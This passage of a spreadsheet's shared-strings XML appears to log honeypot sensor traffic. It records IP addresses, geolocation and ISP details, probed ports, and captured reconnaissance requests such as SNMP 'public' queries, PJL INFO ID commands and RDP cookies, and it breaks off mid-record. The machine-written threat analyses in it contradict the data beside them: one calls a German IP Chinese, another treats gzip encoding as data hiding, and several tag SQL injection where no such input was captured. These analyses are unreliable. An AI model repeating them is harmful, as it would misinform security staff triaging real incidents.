    <t>SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_SOCKS5_H6</t>
  </si>
  <si>
    <t>5900&amp;&amp;1080&amp;&amp;389</t>
  </si>
  <si>
    <t>{'all.s5h.net': ['unknown']&amp;&amp; 'b.barracudacentral.org': ['unknown']}</t>
  </si>
  <si>
    <t>{Data_VNC:NA}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_LDAP:NA}</t>
  </si>
  <si>
    <t>::ffff:abe2:12e1</t>
  </si>
  <si>
    <t>No VNC connection attempts were recorded, indicating the system remains undetected by potential attackers.
This lack of activity may suggest that attackers are avoiding this service or have already compromised other means to access the system. &amp;&amp; No VNC connections were recorded, which could indicate that attackers did not attempt to access this service or they failed to establish a connection successfully. This lack of activity may suggest that this service is not currently being targeted by malicious actors. The absence of any log data for VNC does not necessarily mean the service is secure but rather that it was not accessed during this timeframe.</t>
  </si>
  <si>
    <t>VNC Scanning &amp;&amp; VNC Brute</t>
  </si>
  <si>
    <t>890b83fbf87f9bc1039435a30a8a790a</t>
  </si>
  <si>
    <t>146.70.107.196</t>
  </si>
  <si>
    <t>Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Anonymous Behaviour Observed</t>
  </si>
  <si>
    <t>SMA-LAB_HTTPS_HC1</t>
  </si>
  <si>
    <t>8443</t>
  </si>
  <si>
    <t>DE</t>
  </si>
  <si>
    <t>Germany</t>
  </si>
  <si>
    <t>HE</t>
  </si>
  <si>
    <t>Hesse</t>
  </si>
  <si>
    <t>Regierungsbezirk Darmstadt</t>
  </si>
  <si>
    <t>Frankfurt am Main (Innenstadt I)</t>
  </si>
  <si>
    <t>2925533</t>
  </si>
  <si>
    <t>60326</t>
  </si>
  <si>
    <t>50.1013</t>
  </si>
  <si>
    <t>8.62643</t>
  </si>
  <si>
    <t>9009</t>
  </si>
  <si>
    <t>M247 Europe SRL</t>
  </si>
  <si>
    <t>M247 Europe Infra</t>
  </si>
  <si>
    <t>M247 Ltd Frankfurt</t>
  </si>
  <si>
    <t>connection&amp;&amp;GET</t>
  </si>
  <si>
    <t>{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Host': '103.211.202.140:8443', 'User-Agent': 'WanScannerBot/1.0', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:NA}</t>
  </si>
  <si>
    <t>::ffff:9246:6bc4</t>
  </si>
  <si>
    <t>A GET request was made to the device, likely a server, on port 8443 from an IP address in China, indicating potential scanning activity. The User-Agent string is "WanScannerBot", which may indicate automated probing or vulnerability scanning software. This could be a reconnaissance attempt before launching further attacks. &amp;&amp; An unknown bot, WanScannerBot, is making a GET request to the root of a server on a specific IP address, likely scanning for vulnerabilities or gathering information. This could be a reconnaissance activity by an attacker to identify potential targets. The request includes gzip compression, which may indicate attempted data hiding or encryption.</t>
  </si>
  <si>
    <t>Port Scan &amp;&amp; Scanning Bot</t>
  </si>
  <si>
    <t>633d2ed8b15ef8cbc4adf81d446300b1</t>
  </si>
  <si>
    <t>45.135.193.66</t>
  </si>
  <si>
    <t>SMA-LAB_POSTGRES_HC1&amp;&amp;SMA-LAB_SOCKS5_H4</t>
  </si>
  <si>
    <t>5432&amp;&amp;1080&amp;&amp;443</t>
  </si>
  <si>
    <t>BY</t>
  </si>
  <si>
    <t>Bavaria</t>
  </si>
  <si>
    <t>Lower Bavaria</t>
  </si>
  <si>
    <t>Hauzenberg (Germannsdorf)</t>
  </si>
  <si>
    <t>2908661</t>
  </si>
  <si>
    <t>94051</t>
  </si>
  <si>
    <t>48.6242</t>
  </si>
  <si>
    <t>13.6687</t>
  </si>
  <si>
    <t>51396</t>
  </si>
  <si>
    <t>Pfcloud UG</t>
  </si>
  <si>
    <t>2019-07-31</t>
  </si>
  <si>
    <t>{Data_POSTGRES:NA}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_HTTPS:{'Host': 'https://194.233.76.135/', 'method': 'GET', 'uri': '/remote/login?lang=en'}}&amp;&amp;{Data_HTTPS:NA}</t>
  </si>
  <si>
    <t>::ffff:2d87:c142</t>
  </si>
  <si>
    <t>cc7c5b1d503c1f96c1803481d2792567</t>
  </si>
  <si>
    <t>117.195.197.251</t>
  </si>
  <si>
    <t>{'b.barracudacentral.org': ['unknown']}</t>
  </si>
  <si>
    <t>::ffff:75c3:c5fb</t>
  </si>
  <si>
    <t>9fd68ee9ea3c1a5c9c0a98a8cb9af1da</t>
  </si>
  <si>
    <t>59.184.139.139</t>
  </si>
  <si>
    <t>GJ</t>
  </si>
  <si>
    <t>Gujarat</t>
  </si>
  <si>
    <t>Surat</t>
  </si>
  <si>
    <t>1255364</t>
  </si>
  <si>
    <t>21.1959</t>
  </si>
  <si>
    <t>72.8302</t>
  </si>
  <si>
    <t>Mahanagar Telephone Nigam Limited</t>
  </si>
  <si>
    <t>corporate</t>
  </si>
  <si>
    <t>::ffff:3bb8:8b8b</t>
  </si>
  <si>
    <t>a01eacf0e17abd4ebc0f15b2e48363cf</t>
  </si>
  <si>
    <t>205.210.31.28</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H4&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_MSSQL_H36&amp;&amp;SMA-LAB_FTP_H30&amp;&amp;SMA-LAB_IMAP_H24&amp;&amp;SMA-LAB_POSTGRES_H18&amp;&amp;SMA-LAB_MYSQL_H22&amp;&amp;SMA-LAB_FTP_H24&amp;&amp;SMA-LAB_FTP_H9&amp;&amp;SMA-LAB_SOCKS5_H25&amp;&amp;SMA-LAB_MT-CPA_H46&amp;&amp;SMA-LAB_REDIS_H7&amp;&amp;SMA-LAB_NTP_H15&amp;&amp;SMA-LAB_RDP_H42&amp;&amp;SMA-LAB_POSTGRES_H33&amp;&amp;SMA-LAB_POSTGRES_H40&amp;&amp;SMA-LAB_VNC_H41&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_LDAP_H12&amp;&amp;SMA-LAB_SNMP_H19&amp;&amp;SMA-LAB_MSSQL_H19&amp;&amp;SMA-LAB_MSSQL_H40&amp;&amp;SMA-LAB_HTTP_H4&amp;&amp;SMA-LAB_FTP_H31&amp;&amp;SMA-LAB_HTTP_H3&amp;&amp;SMA-LAB_REDIS_H12&amp;&amp;SMA-LAB_ORACLE_H36&amp;&amp;SMA-LAB_SNMP_H12&amp;&amp;SMA-LAB_SNMP_H41&amp;&amp;SMA-LAB_PJL_H7&amp;&amp;SMA-LAB_FTP_H47&amp;&amp;SMA-LAB_POSTGRES_H9&amp;&amp;SMA-LAB_SOCKS5_H7&amp;&amp;SMA-LAB_VNC_H14&amp;&amp;SMA-LAB_SNMP_H37&amp;&amp;SMA-LAB_SNMP_H33&amp;&amp;SMA-LAB_IMAP_H16&amp;&amp;SMA-LAB_FTP_H28&amp;&amp;SMA-LAB_MSSQL_H7&amp;&amp;SMA-LAB_MYSQL_H10&amp;&amp;SMA-LAB_SNMP_H2&amp;&amp;SMA-LAB_RDP_H21&amp;&amp;SMA-LAB_SMB_H26&amp;&amp;SMA-LAB_SNMP_H39&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_ORACLE_H44</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;23&amp;&amp;1433&amp;&amp;21&amp;&amp;5432&amp;&amp;3306&amp;&amp;1080&amp;&amp;64744&amp;&amp;6379&amp;&amp;NA&amp;&amp;3389&amp;&amp;5900&amp;&amp;161&amp;&amp;1521&amp;&amp;9100&amp;&amp;445&amp;&amp;143&amp;&amp;389&amp;&amp;110&amp;&amp;52905&amp;&amp;6667</t>
  </si>
  <si>
    <t>query&amp;&amp;connection&amp;&amp;stshash&amp;&amp;command&amp;&amp;NA&amp;&amp;request</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1.1.1.0', 'version': '0'}}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=qhdXmQYgf'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=SHOGAn'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=uZUdCR'}}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'a001'}}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.28,59462)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.28,59478)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.28,59486)}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=GpJdksXpb'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=SiwgjD'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=xBpYgT'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=BYfPNsJNh'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=ouArEA'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=znCxJk'}}&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.28,63210)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.28,63222)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.28,63228)}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}</t>
  </si>
  <si>
    <t>::ffff:cdd2:1f1c</t>
  </si>
  <si>
    <t>The attacker is likely scanning for open services and probing the system for vulnerabilities, attempting to gain unauthorized access through various protocols such as FTP, HTTP, HTTPS, LDAP, MSSQL, MYSQL, NTP, Oracle, PJL, POP3, SMTP, SNMP, and SMB. &amp;&amp; Malicious activity detected, attacker attempting to establish secure connection through unauthorized FTP authentication request with TLS protocol enabled. 
Possible attempt to exploit weak FTP server security or steal sensitive credentials by mimicking legitimate login attempts. 
May indicate an initial reconnaissance phase of a larger attack. &amp;&amp; This indicates an attempt to enable TLS encryption during authentication for FTP service, which could be a step in exploiting the system or attempting unauthorized access. The activity suggests malicious intent as it's trying to secure the connection after initiating authentication. This behavior is suspicious as legitimate users would typically authenticate before requesting encryption.</t>
  </si>
  <si>
    <t xml:space="preserve">  &amp;&amp; TLS Brute &amp;&amp; TSL Auth</t>
  </si>
  <si>
    <t>c6b14fb9b168c8c8e8ee12de534f2ec9</t>
  </si>
  <si>
    <t>205.210.31.135</t>
  </si>
  <si>
    <t>['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:mail']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_REDIS_H12&amp;&amp;SMA-LAB_REDIS_H40&amp;&amp;SMA-LAB_SNMP_H30&amp;&amp;SMA-LAB_MYSQL_H19&amp;&amp;SMA-LAB_PJL_H26&amp;&amp;SMA-LAB_RDP_H37&amp;&amp;SMA-LAB_SSH_H12&amp;&amp;SMA-LAB_MT-CPA_H26&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_FTP_H37&amp;&amp;SMA-LAB_SIP_H22&amp;&amp;SMA-LAB_RDP_H44&amp;&amp;SMA-LAB_ORACLE_H26&amp;&amp;SMA-LAB_LDAP_H32&amp;&amp;SMA-LAB_PJL_H29&amp;&amp;SMA-LAB_PJL_H11&amp;&amp;SMA-LAB_FTP_H27&amp;&amp;SMA-LAB_PJL_H24&amp;&amp;SMA-LAB_PJL_H31&amp;&amp;SMA-LAB_FTP_H31&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_MYSQL_H13&amp;&amp;SMA-LAB_IMAP_H12&amp;&amp;SMA-LAB_MSSQL_H46&amp;&amp;SMA-LAB_SOCKS5_H27&amp;&amp;SMA-LAB_SOCKS5_H15&amp;&amp;SMA-LAB_MYSQL_H44&amp;&amp;SMA-LAB_MT-CPA_H4&amp;&amp;SMA-LAB_FTP_H14&amp;&amp;SMA-LAB_RDP_H42&amp;&amp;SMA-LAB_VNC_H18&amp;&amp;SMA-LAB_SOCKS5_H10&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_MYSQL_H39&amp;&amp;SMA-LAB_SNMP_H16&amp;&amp;SMA-LAB_POSTGRES_H34&amp;&amp;SMA-LAB_IMAP_H7&amp;&amp;SMA-LAB_PJL_H38&amp;&amp;SMA-LAB_MYSQL_H33&amp;&amp;SMA-LAB_POSTGRES_H41&amp;&amp;SMA-LAB_ORACLE_H22&amp;&amp;SMA-LAB_FTP_H9&amp;&amp;SMA-LAB_NTP_H38&amp;&amp;SMA-LAB_MYSQL_H29&amp;&amp;SMA-LAB_SNMP_H15&amp;&amp;SMA-LAB_RDP_H40&amp;&amp;SMA-LAB_SNMP_H46</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;6379&amp;&amp;161&amp;&amp;3306&amp;&amp;9100&amp;&amp;3389&amp;&amp;22&amp;&amp;3656&amp;&amp;21&amp;&amp;NA&amp;&amp;1521&amp;&amp;5900&amp;&amp;143&amp;&amp;1433&amp;&amp;1080&amp;&amp;52883&amp;&amp;5432&amp;&amp;445&amp;&amp;8443&amp;&amp;443</t>
  </si>
  <si>
    <t>query&amp;&amp;connection&amp;&amp;command&amp;&amp;GET&amp;&amp;request</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1.1.1.0', 'version': '0'}}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.135,62138)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.135,62140)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.135,62152)}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'a001'}}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1', 'version': '1'}}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.135,59258)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.135,64820)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.135,64836)}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_NTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_SIP:NA}</t>
  </si>
  <si>
    <t>::ffff:cdd2:1f87</t>
  </si>
  <si>
    <t>No MySQL database login attempts detected but the field for this type of activity is empty which may indicate an attempt to exploit or hide malicious access. 
This could be indicative of an attacker trying to remain undetected by not accessing a specific account.
The absence of data in this field may suggest suspicious activity has occurred here but was blocked or erased before being recorded.</t>
  </si>
  <si>
    <t>SQL Inj</t>
  </si>
  <si>
    <t>a964ce18b3696a4e2a3c2635e6d20f5b</t>
  </si>
  <si>
    <t>118.232.48.16</t>
  </si>
  <si>
    <t>118-232-48-16.dynamic.kbronet.com.tw&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H35</t>
  </si>
  <si>
    <t>1433&amp;&amp;445</t>
  </si>
  <si>
    <t>TW</t>
  </si>
  <si>
    <t>Taiwan</t>
  </si>
  <si>
    <t>Taipei City</t>
  </si>
  <si>
    <t>Taipei</t>
  </si>
  <si>
    <t>1668341</t>
  </si>
  <si>
    <t>25.0466</t>
  </si>
  <si>
    <t>121.541</t>
  </si>
  <si>
    <t>38841</t>
  </si>
  <si>
    <t>kbro CO. Ltd.</t>
  </si>
  <si>
    <t>KBRO</t>
  </si>
  <si>
    <t>2007-11-01</t>
  </si>
  <si>
    <t>KBRO-NET</t>
  </si>
  <si>
    <t>{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (118.232.48.16,13506)}&amp;&amp;{Data_SMB:Incoming connection (118.232.48.16,13854)}</t>
  </si>
  <si>
    <t>2007-08-27 14:41:18</t>
  </si>
  <si>
    <t>2026-08-27 00:00:00</t>
  </si>
  <si>
    <t>ns1.kbronet.com.tw     211.76.112.59 
      ns2.kbronet.com.tw     211.76.112.60</t>
  </si>
  <si>
    <t>TFN</t>
  </si>
  <si>
    <t>::ffff:76e8:3010</t>
  </si>
  <si>
    <t>c9abf3c703efbf43309c78f89f9672e5</t>
  </si>
  <si>
    <t>205.210.31.143</t>
  </si>
  <si>
    <t>['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:sip']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_IMAP_H4&amp;&amp;SMA-LAB_HTTP_H8&amp;&amp;SMA-LAB_POP3_H5&amp;&amp;SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_MYSQL_H5&amp;&amp;SMA-LAB_POSTGRES_H22&amp;&amp;SMA-LAB_SOCKS5_H9&amp;&amp;SMA-LAB_VNC_H45&amp;&amp;SMA-LAB_SOCKS5_H5&amp;&amp;SMA-LAB_SOCKS5_H36&amp;&amp;SMA-LAB_SMB_H32&amp;&amp;SMA-LAB_MT-CPA_H31&amp;&amp;SMA-LAB_SNMP_H33&amp;&amp;SMA-LAB_IMAP_H15&amp;&amp;SMA-LAB_RDP_H42&amp;&amp;SMA-LAB_VNC_H34&amp;&amp;SMA-LAB_MYSQL_H26&amp;&amp;SMA-LAB_MYSQL_H37&amp;&amp;SMA-LAB_SIP_H9&amp;&amp;SMA-LAB_ORACLE_H38&amp;&amp;SMA-LAB_LDAP_H3&amp;&amp;SMA-LAB_ORACLE_H34&amp;&amp;SMA-LAB_SNMP_H36&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_LDAP_HC1&amp;&amp;SMA-LAB_SOCKS5_H6&amp;&amp;SMA-LAB_SOCKS5_H16&amp;&amp;SMA-LAB_MT-CPA_H4&amp;&amp;SMA-LAB_SOCKS5_H18&amp;&amp;SMA-LAB_PJL_H38&amp;&amp;SMA-LAB_PJL_H28&amp;&amp;SMA-LAB_IMAP_H44&amp;&amp;SMA-LAB_IMAP_H31&amp;&amp;SMA-LAB_IMAP_H38&amp;&amp;SMA-LAB_LDAP_H34&amp;&amp;SMA-LAB_FTP_H44&amp;&amp;SMA-LAB_RDP_H46&amp;&amp;SMA-LAB_POSTGRES_H10&amp;&amp;SMA-LAB_IMAP_H19&amp;&amp;SMA-LAB_ORACLE_H35&amp;&amp;SMA-LAB_SNMP_H25&amp;&amp;SMA-LAB_SNMP_H21&amp;&amp;SMA-LAB_POSTGRES_H47&amp;&amp;SMA-LAB_MYSQL_H39&amp;&amp;SMA-LAB_SNMP_H22</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;143&amp;&amp;80&amp;&amp;110&amp;&amp;23&amp;&amp;3306&amp;&amp;5432&amp;&amp;1080&amp;&amp;5900&amp;&amp;445&amp;&amp;3394&amp;&amp;161&amp;&amp;3389&amp;&amp;NA&amp;&amp;1521&amp;&amp;50319&amp;&amp;9100&amp;&amp;21&amp;&amp;6379&amp;&amp;389&amp;&amp;52159&amp;&amp;1433&amp;&amp;49963</t>
  </si>
  <si>
    <t>{'all.s5h.net': ['unknown']&amp;&amp; 'dnsbl-2.uceprotect.net': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['exploits']}</t>
  </si>
  <si>
    <t>query&amp;&amp;connection&amp;&amp;command&amp;&amp;GET&amp;&amp;stshash&amp;&amp;NA</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1.1.1.0', 'version': '0'}}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'a001'}}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'User-Agent': 'Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers&amp;#39; presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.143,61028)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.143,61030)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.143,61046)}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=CWOUNUVQm'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=BzxdPY'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=UGQroA'}}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=yTPToaTJT'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=vZtIQw'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=KbSanw'}}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'CAPA'}}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=LeXbaiXDg'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=xSAjxL'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=uJPCUQ'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1', 'version': '1'}}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SOCKS5:NA}</t>
  </si>
  <si>
    <t>::ffff:cdd2:1f8f</t>
  </si>
  <si>
    <t>The data suggests that an attempt was made to access the Oracle database, which is a common target for attackers looking to steal sensitive information or gain unauthorized access.
This could be part of a larger attack aimed at compromising database security. 
The attacker likely used a tool or script to probe the database for vulnerabilities.</t>
  </si>
  <si>
    <t>SQL Injection</t>
  </si>
  <si>
    <t>13aa4fbcd039ced0beb3364c8131e854</t>
  </si>
  <si>
    <t>103.199.203.121</t>
  </si>
  <si>
    <t>HR</t>
  </si>
  <si>
    <t>Haryana</t>
  </si>
  <si>
    <t>Gurugram</t>
  </si>
  <si>
    <t>Gurugram (Sector 44)</t>
  </si>
  <si>
    <t>1270644</t>
  </si>
  <si>
    <t>122003</t>
  </si>
  <si>
    <t>28.4498</t>
  </si>
  <si>
    <t>77.0761</t>
  </si>
  <si>
    <t>24186</t>
  </si>
  <si>
    <t>RailTel Corporation of India Ltd.</t>
  </si>
  <si>
    <t>RailTel Corporation</t>
  </si>
  <si>
    <t>RAILTEL</t>
  </si>
  <si>
    <t>2015-11-10</t>
  </si>
  <si>
    <t>RAILTEL-IN</t>
  </si>
  <si>
    <t>::ffff:67c7:cb79</t>
  </si>
  <si>
    <t>3ed09ac59c8b97d77135524a72f6f726</t>
  </si>
  <si>
    <t>37.142.162.89</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H24</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;NA</t>
  </si>
  <si>
    <t>IL</t>
  </si>
  <si>
    <t>Israel</t>
  </si>
  <si>
    <t>M</t>
  </si>
  <si>
    <t>Central District</t>
  </si>
  <si>
    <t>Nefat HaSharon</t>
  </si>
  <si>
    <t>Yakum</t>
  </si>
  <si>
    <t>293233</t>
  </si>
  <si>
    <t>32.2492</t>
  </si>
  <si>
    <t>34.8419</t>
  </si>
  <si>
    <t>12849</t>
  </si>
  <si>
    <t>Hot-Net internet services Ltd.</t>
  </si>
  <si>
    <t>HOT mobile Ltd</t>
  </si>
  <si>
    <t>cellular</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}</t>
  </si>
  <si>
    <t>::ffff:258e:a259</t>
  </si>
  <si>
    <t>No log data provided for analysis.</t>
  </si>
  <si>
    <t>8ee5bb5078f333bc6b3e4b850ac26aa6</t>
  </si>
  <si>
    <t>178.54.78.190</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MSSQL_H5&amp;&amp;SMA-LAB_MSSQL_H2&amp;&amp;SMA-LAB_MSSQL_H30&amp;&amp;SMA-LAB_SMB_H8&amp;&amp;SMA-LAB_MSSQL_H27&amp;&amp;SMA-LAB_MT-CPA_H30&amp;&amp;SMA-LAB_SMB_H32&amp;&amp;SMA-LAB_MSSQL_H18&amp;&amp;SMA-LAB_SMB_H45&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H32</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;445&amp;&amp;21786&amp;&amp;NA&amp;&amp;46280</t>
  </si>
  <si>
    <t>UA</t>
  </si>
  <si>
    <t>Ukraine</t>
  </si>
  <si>
    <t>32</t>
  </si>
  <si>
    <t>Kyiv</t>
  </si>
  <si>
    <t>Vyshhorod Raion</t>
  </si>
  <si>
    <t>Khotianivka</t>
  </si>
  <si>
    <t>8519882</t>
  </si>
  <si>
    <t>50.5972</t>
  </si>
  <si>
    <t>30.5714</t>
  </si>
  <si>
    <t>29107</t>
  </si>
  <si>
    <t>Synapse Network LTD</t>
  </si>
  <si>
    <t>SYNAPSE</t>
  </si>
  <si>
    <t>Private Stock company Sater</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (178.54.78.190,53068)}&amp;&amp;{Data_SMB:Incoming connection (178.54.78.190,53204)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (178.54.78.190,60030)}&amp;&amp;{Data_SMB:Incoming connection (178.54.78.190,60120)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (178.54.78.190,64044)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (178.54.78.190,64678)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (178.54.78.190,62562)}&amp;&amp;{Data_SMB:Incoming connection 